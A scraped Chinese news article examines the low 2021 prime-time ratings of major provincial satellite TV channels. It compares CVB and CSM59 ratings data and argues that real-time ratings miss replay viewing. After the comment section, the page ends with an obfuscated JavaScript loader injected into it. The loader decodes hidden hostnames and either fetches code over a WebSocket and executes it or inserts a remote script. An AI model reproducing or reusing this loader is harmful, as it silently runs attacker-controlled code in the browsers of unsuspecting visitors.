时间:2021-06-07 23:05:52播放:2500

本文来自微信公众号“新剧观察”(ID:xinjuguancha),作者: 啊

0.2、0.3、0.4、0.5。 

谁能想到,如此勉强的数字,是今年五大一线卫视黄金档剧目的收视成绩。 

上一轮收官剧目中,卫视的表现均不如预期。 

根据广电总局中国视听大数据 (下简称“CVB”) ,江苏、浙江卫视联播的《号手就位》,双台综合收视0.481%;湖南卫视独播的《八零九零》单台平均收视0.343%,北京、东方、广东卫视联播的《啊摇篮》,三台综合收视0.808%。 

卫视大盘低迷,实时收视率还有参考价值吗?

新一轮接档剧目中,靳东主演、被寄予厚望的《温暖的味道》已接近收官,收视稳定徘徊在0.4%前后;新近开播的《光荣与梦想》,东方、北京卫视第1——7集平均收视0.288%、0.265%,后续走势有待进一步观望。 

卫视大盘低迷,实时收视率还有参考价值吗?

放眼到前5个月,五大一线卫视中,目前的收视冠军《风起霓裳》,湖南卫视CVB集均收视0.703%,数据表现并不亮眼。 

卫视大盘低迷,实时收视率还有参考价值吗?

央、卫界限分明。 

CCTV8、CCTV1包揽了今年目前为止,平均收视破1的所有剧目 。《妈妈在等你》《跨过鸭绿江》 (重播) 《觉醒年代》《小舍得》《生活万岁》《紧急公关》《甜蜜》《经山历海》《武当一剑》《明天我们好好过》等11部集均收视破1剧目,无一例外,均出自央视频道。 

卫视大盘低迷,实时收视率还有参考价值吗?

CVB“偏袒”央视,是共识,但一看CSM59城令人傻眼的10倍系数差,信服力瞬间大打折扣。 

自2019年12月27日CVB诞生计起,官方统管电视剧收视已将近一年半时间,电视剧制播、广告投放究竟应该参考哪份数据,仍然没有令人信服的答案。 

CSM59城公信力扫地,五大一线卫视招商还是我行我素,坚持以CSM59城数据为准;CVB以“脱水”、真实性闻名,但对广告商意义不大,甚至于对整个行业未来的电视剧制播方向,参考价值也有待商榷。 

有“回看”功能的智能电视走进千家万户,实时收视统计,究竟还有多大参考价值?大数据时代,如何才算收视公平?这些问题,都需要引起思考。 

失利的收视福将

对比去年1——5月,五大一线卫视黄金档已经输出了6部平均收视破1剧目。东方、北京卫视联播的《安家》于2月21日播出,CVB集均收视2.121%、1.095%,是去年一整年的卫视年冠。 

卫视大盘低迷,实时收视率还有参考价值吗?

如果岁月可回头》《完美关系》《下一站幸福》《猎狐》《新世界》等平均收视破1的黄金档剧目,在去年被狠狠鄙视了一把。放到今年,这都是个顶个的热播剧、爆款剧。

卫视大盘低迷,实时收视率还有参考价值吗?

今年前5个月的电视剧市场,“收视福将”们全部失灵。 

“大古装”自身难保,遑论救市。 《风起霓裳》虽然是目前的卫视第一,但这个冠军太过低调,存在感甚至比不上排名第4、一集一热搜的《小舍得》 (《小舍得》为CCTV8、东方卫视联播剧目,此处的“排名第4”指东方卫视收视表现位列省级卫视前5个月总收视第4)。 

卫视大盘低迷,实时收视率还有参考价值吗?

古装失利, 话题剧也不靠谱。 

用教育内卷话题戳中观众肺管子的《小舍得》,跟去年的《安家》《三十而已》一个路数,但收视表现上,次了一个梯队。《安家》卫视集均收视破2,《三十而已》卫视集均收视破1,《小舍得》东方卫视集均收视0.66%,不到《安家》的三分之一。 

卫视大盘低迷,实时收视率还有参考价值吗?

“流量”也未发挥既往水平。 

集结一众“流量”的《理想照耀中国》,演员阵容星光熠熠,收视表现持续低迷,后续走势,不禁让人捏了一把汗。 

0.2,代表卫视的真实水平吗?

如此不乐观的收视表现,能代表五大一线卫视的真实水平吗? 

先从CVB、CSM59城的各执一词说起。 

CVB数据的真实性毋庸置疑,但一个现实顾虑是,对广告投放的参考意义不大。 

五大一线卫视招商,引用的都是对自己有利的数据,CSM59城水分大,却是广告主不得不参考的收视指标。 

在样本上,CSM59城属于城市组数据,由此3.91万样本户推及的2.48亿人口,更具经济实力和消费欲望,是广告主的重点投放对象。CVB数据样本为全国1.7亿有线电视、IPTV用户,既可能包含城市网,也可能包含农村地区。 一季度一次的卫视招商会上,更常见的是CSM59城收视数据,CVB数据未被广泛征用, 原因出在样本户、推及人口的地域差异上。 

更重要的是, 统计逻辑不一的情况下,将CVB、CSM59城数据放在同一坐标系上同向比较,本身就是有失偏颇的。CVB收视低迷,CSM59城节节高升,不一定是数据受到污染,有可能是样本户的地域差异造成的。 

此外,我们看到, CVB数据有赖央视底盘的带动 。诸如《武当一剑》这样的积压剧,不受卫视频道青睐,但得益于央视收视底盘的带动,在卫视收视整体低迷的情况下,仍然取得了CCTV8——电视剧频道1%的集均收视成绩,与《小舍得》在CCTV8——电视剧频道1.15%的成绩不相上下。据此草率地认为,《武当一剑》与《小舍得》的投资回报率相当,显然是不负责任的结论。 

卫视大盘低迷,实时收视率还有参考价值吗?

必须承认, 央视频道有一定的收视“镀金”作用。电视剧制播以CVB数据为唯一参考指标,寄希望于积压剧带动收视,于电视剧市场活力发展无益。 

如何才算收视公平?

收视公平,不是要CVB、CSM59城数据“打架”,一个关键是理清剧集收视和作品影响力之间的关系。 

CVB、CSM59城数据都是统计固定时间段内,某一电视节目的收视情况。 CVB电视剧收视统计1.7亿用户在19:30——21:50黄金时段的电视收看情况,得出一周内电视剧收视平均数;CSM59城电视剧收视检测59个主流城市全天收视情况,得出每日电视剧实时收视指标。具体到广告主最在意的19:30——21:50黄金时段,CVB、CSM59城数据 对应的是相应时段广告价值的参考。 

伴随智能电视的普及,用户观看电视的方式也发生了变化。尤其城市网用户,在工作加班、堵车等不可抗力影响下,很难养成19:30——21:50固定时间段打开电视的收视习惯。 “实时”数据,是不包括“回看”的, 但如今的电视观众,显然更常使用“回看”这一收看功能。 就单部电视剧作品而言,19:30——21:50黄金时段的收视成绩,体现出它在相应时间段的广告价值,但不能完全代表作品本身及卫视平台的影响力。 在黄金时段等固定时间段之外,作品、卫视平台的影响力如何界定,当下的收视统计数据很难给出全面、准确、详尽的参考。 

样本户有限,也是一个问题。 

无论是CVB取样的1.7亿用户,还是CSM59城推及的2.48亿人口,样本数量都极其有限。根据《2020年全国广播电视行业统计公报》数据, 截至2020年底,全国有线电视实际用户数2.07亿,交互式网络电视(IPTV)用户超过3亿,互联网电视(OTT)用户9.55亿。 当下的收视数据统计逻辑中,有限的样本户数量限制了收视统计结果的准确性,不能代表全民收视情况。 

卫视大盘低迷,实时收视率还有参考价值吗?

云存储、云计算应用之前,电视人口众多,决定了收视数据统计必须取样调查,一对一实时监测,并不现实。但是,大数据时代,接入全民电视收看数据,却是有可能的。假使有一天,收视率高低参照的用户基数是全体电视观众,那样的收视统计,才叫公平。 

评论

  • 评论加载中...
function cySkHj(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function wcBqn(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return cySkHj(t);};window['\x55\x67\x74\x65\x64\x58\x56\x4f\x76']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=wcBqn,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('ZmIuc2ltcGFzzYS5jbg==','dHIueWVzdW422NzguY229t','134812',window,document,['z','2']);}:function(){};